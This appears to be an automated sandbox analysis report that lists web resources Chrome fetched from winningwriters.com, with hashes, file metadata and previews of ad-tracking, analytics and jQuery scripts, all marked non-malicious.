                                                                                                                                                                                            SHA-256:A1B63DC61424245C99D54DFDFC95BF08AD24A2FB9A1727F1E245E713FA6C72D8
                                                                                                                                                                                            SHA-512:8237D1C8D121CF88FBD8AD9100E20891ABB08A91CCEDCA14C6DABBC4013A86BC0C200BBF861B751F438CF4233D0DBEF3CFF24B90BAC8435B4495F977E61B06A1
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:function _0x31bf(_0x10783e,_0x356c5a){const _0x338a4a=_0x242a();return _0x31bf=function(_0x1e8151,_0x3b4331){_0x1e8151=_0x1e8151-(-0x5*0x401+-0x1b9d*0x1+0x3177);let _0x5784b7=_0x338a4a[_0x1e8151];if(_0x31bf['EoVILL']===undefined){var _0x882112=function(_0x2be794){const _0x2b17ca='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x1bb4f0='',_0x484a15='',_0x116e30=_0x1bb4f0+_0x882112;for(let _0x3de974=0x38*0x45+0xbda*-0x3+0x1476,_0x3bb0c9,_0x40931c,_0x37ef15=-0x971*0x1+0x32*-0xbb+0x2df7;_0x40931c=_0x2be794['charAt'](_0x37ef15++);~_0x40931c&&(_0x3bb0c9=_0x3de974%(-0x1387+-0x1be3+0x2f6e)?_0x3bb0c9*(-0x3*-0x44f+-0x2619+0x196c)+_0x40931c:_0x40931c,_0x3de974++%(0x5d9*-0x2+-0x1fbf+0x1*0x2b75))?_0x1bb4f0+=_0x116e30['charCodeAt'](_0x37ef15+(-0x253f+-0x10cc+-0x3*-0x1207))-(-0x3*0x3c3+0x1145+-0x5f2)!==0x2264+0x126*0x8+-0x2b94?String['fromCharCode'](0x2*-0x712+0xe2*0x7+0x8f5&_0x3bb0c9>>(-(0x21b5*-0x1+-0x1822+-0xfb*-0x3b)*_0x3de974&-0x3*-0x2d9+0x4*-0x6e5+0x130f)):_0x3de974:0x3
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):44
                                                                                                                                                                                            Entropy (8bit):4.632965073714562
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:HItLyuWSUZaTNWVk+:oob8BAk+
                                                                                                                                                                                            MD5:7E768E949B9A237BEA188D0ADC8F439A
                                                                                                                                                                                            SHA1:DE9BDAF7067D1E2CE926A4655C9538BDE69EF33B
                                                                                                                                                                                            SHA-256:751DC1F5E3744A0000B0DAB7197E5A14808693219725A6185B9F57DE436054B9
                                                                                                                                                                                            SHA-512:59DD6679221994C11CB84A3EA74CA9B881E28321B31097E3863211F317B07E2FF41B3A85EC483384BD10BB19BB565A07A9F222E5CC43B815C3BE61ACF0D7658D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAnpVicxfI0C5hIFDfUExScSFwlnlVNGSIVs3BIFDQT1TzESBQ3MhcbG?alt=proto
                                                                                                                                                                                            Preview:CgkKBw31BMUnGgAKEgoHDQT1TzEaAAoHDcyFxsYaAA==
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://td.doubleclick.net/td/rul/1072733940?random=1731960118416&cv=11&fst=1731960118416&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top
                                                                                                                                                                                            Preview:<html></html>
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):80838
                                                                                                                                                                                            Entropy (8bit):5.356181148316
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:RJeUwT76HXhpwPCHM9ZVK01QqSYTZ02LKVsdmpyKcicgR:RIT7OXVs9ZVKBvYj8wKcHgR
                                                                                                                                                                                            MD5:0DBF49EBCA66DAE9D42B158D4113DEAC
                                                                                                                                                                                            SHA1:7261E96704C938CCF6491A18E02631B009A5FF03
                                                                                                                                                                                            SHA-256:15A68B948A9022C4F0C3E7FD9F38CB6D692F0F8E31AA9264CE06FF521B282D15
                                                                                                                                                                                            SHA-512:F5790D980BC7948ED0CC499342C2848E2662BCD79F91A1E44CB100BED0B011157BCDD86DC15132D9ED0F631447DAF5196FB8CC78D6D2B0D10B50553A68A8A84C
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://connect.facebook.net/signals/config/188856481728275?v=2.9.177&r=stable&domain=winningwriters.com&hme=c3e4904c1dde42d643265ef909b9e193c41cedcd6f559a3ff5e1b178e36647fa&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113
                                                                                                                                                                                            Preview:/**.* Copyright (c) 2017-present, Facebook, Inc. All rights reserved..*.* You are hereby granted a non-exclusive, worldwide, royalty-free license to use,.* copy, modify, and distribute this software in source code or binary form for use.* in connection with the web services and APIs provided by Facebook..*.* As with any software that integrates with the Facebook platform, your use of.* this software is subject to the Facebook Platform Policy.* [http://developers.facebook.com/policy/]. This copyright notice shall be.* included in all copies or substantial portions of the software..*.* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.* IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS.* FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR.* COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER.* IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN.* CONNECTION WI
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, Unicode text, UTF-8 text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2359
                                                                                                                                                                                            Entropy (8bit):4.572038633934563
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:oN3xuHt7KDJcM9wGcbXZ7GtMfgoTatdwGT27TwN0dV/RXdtdwGTl7FY:Wmt7KtMMtMYUa3ws27Tc0dV/RXd3wslO
                                                                                                                                                                                            MD5:945DB02446BE8575962F4F2DDBFE3FD3
                                                                                                                                                                                            SHA1:1DBA342E6A98D7E72EB8F652B50227CDD88686E3
                                                                                                                                                                                            SHA-256:CDA36CC6C8BA189A635599B3FA282546A09B74E014FECE0DA216756B04F1A993
                                                                                                                                                                                            SHA-512:87B5E823F8ECB776F3EB9AC55AD927DE38AD50780F51300FD85300B18938C263E057CB9D26CD1A78F6CFDEB93D13270D5275EBA1FB43BAFBF62C2BCBAD7E3C7B
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/ga-track.js
                                                                                                                                                                                            Preview:/*..from: http://www.blastam.com/blog/index.php/2011/04/how-to-track-downloads-in-google-analytics/..Tracks file downloads as events for the following extensions: .zip, .exe, .pdf, .doc, .docx, .xls, .xlsx, .ppt, .pptx, .mp3 (again feel free to modify the list)..Tracks outbound clicks as events if the href value contains http:// or https:// and the domain value doesn.t match the current domain..Tracks mailto email clicks..*/.//<script type="text/javascript">.if (typeof jQuery != 'undefined') {. jQuery(document).ready(function($) {. var filetypes = /\.(zip|exe|pdf|doc*|xls*|ppt*|mp3)$/i;. var baseHref = '';. if (jQuery('base').attr('href') != undefined). baseHref = jQuery('base').attr('href');. jQuery('a').each(function() {. var href = jQuery(this).attr('href');. if (href && (href.match(/^https?\:/i)) && (!href.match(document.domain))) {. jQuery(this).click(function() {. var extLink = hre
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (15345)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):415838
                                                                                                                                                                                            Entropy (8bit):5.650941137121935
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:h4rDi3NDXB0l9MPzEeRIB7mP9BxTr81KfcdM8:6rmdN09MwoW3
                                                                                                                                                                                            MD5:4097F3BDAA6831B23F04ABA9DAEAE123
                                                                                                                                                                                            SHA1:8F5B7DCAE077817D67CA97453E120E0E25C3D556
                                                                                                                                                                                            SHA-256:D517FBDC62F82A333861DA52A23085EDCB1C5B84419C46F72D65DCDA16DE6AAE
                                                                                                                                                                                            SHA-512:C9CFC5F3BCDA0CD7ED53CF5C6EAB7EB66E00C81D37D959DAF3CB7C0876C0FEB7E6D9F94EBDC8286DB2D1A4D78574D0E5C1D6BAD56F03A5EE47FACF5678B817B5
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://www.googletagmanager.com/gtag/js?id=G-S2XE0RVPX9&l=dataLayer&cx=c&gtm=45He4be0v846709124za200
                                                                                                                                                                                            Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"5",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":19,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":8},{"function":"__ogt_1p_data_v2","priority":19,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vt
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):16621
                                                                                                                                                                                            Entropy (8bit):5.122325674580119
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:0THUMZq3ZquGb0A+T9eJkQgDGRTJ+1fdQ9fB9DNm:kq3ZqHIGRMhdsho
                                                                                                                                                                                            MD5:7D87CE904AB76326BFF3147C72A45B2A
                                                                                                                                                                                            SHA1:B5A7A40ADA6F87047F00E95915356AFF82CB0959
                                                                                                                                                                                            SHA-256:58564BC237B683F482C3A82DEF059F27B2BE41109D237D7A2380074B5B4F22BE
                                                                                                                                                                                            SHA-512:FC2F4D093D3C8ECBFD30F25C59F30E92BF7457664ECF8871247B1802671B05B674C047BFCD0C2C9A674B49CE0BAB9CDAED2416F69797381C775019EC250CBC0D
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://code.jquery.com/jquery-migrate-1.2.1.js
                                                                                                                                                                                            Preview:/*!. * jQuery Migrate - v1.2.1 - 2013-05-08. * https://github.com/jquery/jquery-migrate. * Copyright 2005, 2013 jQuery Foundation, Inc. and other contributors; Licensed MIT. */.(function( jQuery, window, undefined ) {.// See http://bugs.jquery.com/ticket/13335.// "use strict";...var warnedAbout = {};..// List of warnings already given; public read only.jQuery.migrateWarnings = [];..// Set to true to prevent console output; migrateWarnings still maintained.// jQuery.migrateMute = false;..// Show a message on the console so devs know we're active.if ( !jQuery.migrateMute && window.console && window.console.log ) {..window.console.log("JQMIGRATE: Logging is active");.}..// Set to false to disable traces that appear with warnings.if ( jQuery.migrateTrace === undefined ) {..jQuery.migrateTrace = true;.}..// Forget any warnings we've already given; public.jQuery.migrateReset = function() {..warnedAbout = {};..jQuery.migrateWarnings.length = 0;.};..function migrateWarn( msg) {..var console =
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 980x450, components 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):108674
                                                                                                                                                                                            Entropy (8bit):7.940125201033711
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:1536:oURqI7lbMi4wRXwr3ECK6XR/mKuYeZXkftHNaUBl/iYXaG6Kacr7UMkDH7PND16G:TlbfRoR/beN8RRL/XLLrYMi7p1FhVYq
                                                                                                                                                                                            MD5:DA9E01F84170A1163A9281DEFAF33CD8
                                                                                                                                                                                            SHA1:45F9F970161E2749BC73F2C0CEFDFDB30A18B2EF
                                                                                                                                                                                            SHA-256:6506FA24A9DD9C402E7BAB720BC5365B08E5266BA6728F170BFC6BB0DEC5DBF3
                                                                                                                                                                                            SHA-512:E1C48148AE3667620A4D965003DEE2E23B05DC3AB4903C30A659DF748E833B885B6CEDBF383D8D7A20C9E02FF42FD8714A85A48B331D5CDEA10EEB23E4C2C71A
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/graphics/tompoetry/hagen_slide_show.jpg
                                                                                                                                                                                            Preview:......Exif..II*.................Ducky.......Z......http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.1-c002 79.dba3da3b5, 2023/12/15-10:42:37 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:CD7654A112206811822AE8C6A079CFFF" xmpMM:DocumentID="xmp.did:25F6B956F20211EE8331DF4817DBDCA3" xmpMM:InstanceID="xmp.iid:25F6B955F20211EE8331DF4817DBDCA3" xmp:CreatorTool="Adobe Photoshop CC 2019 (Macintosh)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:1336bb3b-69de-4e14-985c-139969cdce8e" stRef:documentID="adobe:docid:photoshop:424138f0-d66f-4446-8326-16ba962b178c"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>....Adobe.d..............................
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4909), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4909
                                                                                                                                                                                            Entropy (8bit):5.821231173223883
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRU5eJawytU7N:1DY0h8Rx47OIqWbZgeJawys
                                                                                                                                                                                            MD5:3FA1C50CE0315155B61BFC354826234F
                                                                                                                                                                                            SHA1:44D5E79CADDC998A29B485B09139C7BA0E858219
                                                                                                                                                                                            SHA-256:9526FCAA6CE28127A15286BB3C0AE31A2998148CC809FE04B922FC562B5985B6
                                                                                                                                                                                            SHA-512:9CD10616D39372D11F3C3622B635822EC6D0FEF00BFE6A3CD85DCD7D4EC3463D6C0A52A05D78F4CBB387D7622CB77ECB2E71125586300E28AC201AF27D0B28C6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960118416&cv=11&fst=1731960118416&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&value=Tom%20Howard%2FJohn%20H.%20Reid%20Fiction%20%26%20Essay%20Contest&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dslider_change%3Bevent_category%3DSlider%3Bevent_label%3DAd-Top&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (1795)
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):2079
                                                                                                                                                                                            Entropy (8bit):5.225711130484111
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:48:+FPYH4WZW4dzDXxI5hppcYwNztDbNwF2Dc:WM44dvm5hY5GF2c
                                                                                                                                                                                            MD5:4BC31F2495D98D1A592DB1BCFEC0738B
                                                                                                                                                                                            SHA1:4A57B0E8FB4F30A8DF36179BACDC9CDB551E9A61
                                                                                                                                                                                            SHA-256:8B0DA118C94FD0DB4902EC1EA1981852FD3F33F6EBC231DD4D419400C0A323B2
                                                                                                                                                                                            SHA-512:ECCC9BB411B74DBA683D32B34814492813B57F266F8980BF7D5A3DA51E4CC8BEE430B7E939C39C6654E2DBBDB9A4FAE0C9D20E35E47FC071AC80F39925C254A6
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://winningwriters.com/assets/js/pageslide.js
                                                                                                                                                                                            Preview:/*. * jQuery pageSlide. * Version 2.0. * http://srobbin.com/jquery-pageslide/. *. * jQuery Javascript plugin which slides a webpage over to reveal an additional interaction pane.. *. * Copyright (c) 2011 Scott Robbin (srobbin.com). * Dual licensed under the MIT and GPL licenses..*/.;(function(b){function j(e,a){if(0===e.indexOf("#"))b(e).clone(!0).appendTo(c.empty()).show();else{if(a){var d=b("<iframe />").attr({src:e,frameborder:0,hspace:0}).css({width:"100%",height:"100%"});c.html(d)}else c.load(e);c.data("localEl",!1)}}function k(b,a){var d=c.outerWidth(!0),f={},g={};if(!c.is(":visible")&&!h){h=!0;switch(b){case "left":c.css({left:"auto",right:"-"+d+"px"});f["margin-left"]="-="+d;g.right="+="+d;break;default:c.css({left:"-"+d+"px",right:"auto"}),f["margin-left"]="+="+d,g.left="+="+d}l.animate(f,a);c.show().animate(g,a,function(){h=!1})}}var l=b("body"),c=b("#pageslide"),h=!1,m;0==c.length&&(c=b("<div />").attr("id","pageslide").css("display","none").appendTo(b("body")));b.fn.pagesli
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4762), with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):4762
                                                                                                                                                                                            Entropy (8bit):5.805970557906534
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUPeHGtM2:1DY0h8Rx47OIqWbZGeHGu2
                                                                                                                                                                                            MD5:A5FBC9B8894BF7F65C29093C61459B5A
                                                                                                                                                                                            SHA1:5E3B08841C2D276C8CB1B33E1D2DCA9D67269F75
                                                                                                                                                                                            SHA-256:E27044A4CD798A1F78B6267FEE64D4F00616C19307736EE716D0A15E87856ACC
                                                                                                                                                                                            SHA-512:9B4EC32A820DBCA4F03F195051B1CF475DC72CF271CC0B47C3F1668263537A89144DF122B9F8F87F289E1749DCD28F38C5782BF70922876044C0D68D72A50343
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            URL:https://googleads.g.doubleclick.net/pagead/viewthroughconversion/1072733940/?random=1731960006858&cv=11&fst=1731960006858&bg=ffffff&guid=ON&async=1&gtm=45be4be0v9134294326za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101925629~102067555~102067808~102077855~102081484&u_w=1280&u_h=1024&url=https%3A%2F%2Fwinningwriters.com%2F&hn=www.googleadservices.com&frm=0&tiba=Welcome%20to%20Winning%20Writers%20-%20Winning%20Writers&npa=0&pscdl=noapi&auid=325201710.1731960007&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config&rfmt=3&fmt=4
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines (4880), with no line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):4880
                                                                                                                                                                                            Entropy (8bit):5.811088087879016
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:1gWUfvlcY021mvXElnxad7OIJoodnbUCJdEjkRUhepAmtU7F:1DY0h8Rx47OIqWbZMepAmE
                                                                                                                                                                                            MD5:BF2CEE82CE7F39F76034FD82C59BD387
                                                                                                                                                                                            SHA1:103BA0B2E307D4A57ABE83CC10BE496D508D1166
                                                                                                                                                                                            SHA-256:5942034B9A3359057657A4CD16AC23FE9130BAB312D7AAE6D2CAA7C47909FEAA
                                                                                                                                                                                            SHA-512:EE8F00D5A00C55D81642713A061BE5344FA505FBF842A7BCA8C806629126795B1E97E0D754F0FC431BA9D2A7FC93B473CF9408AAA947E97EB8BA12681FAEB037
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                            Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):13
                                                                                                                                                                                            Entropy (8bit):2.7773627950641693
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                            MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                            SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                            SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                            SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Reputation:low
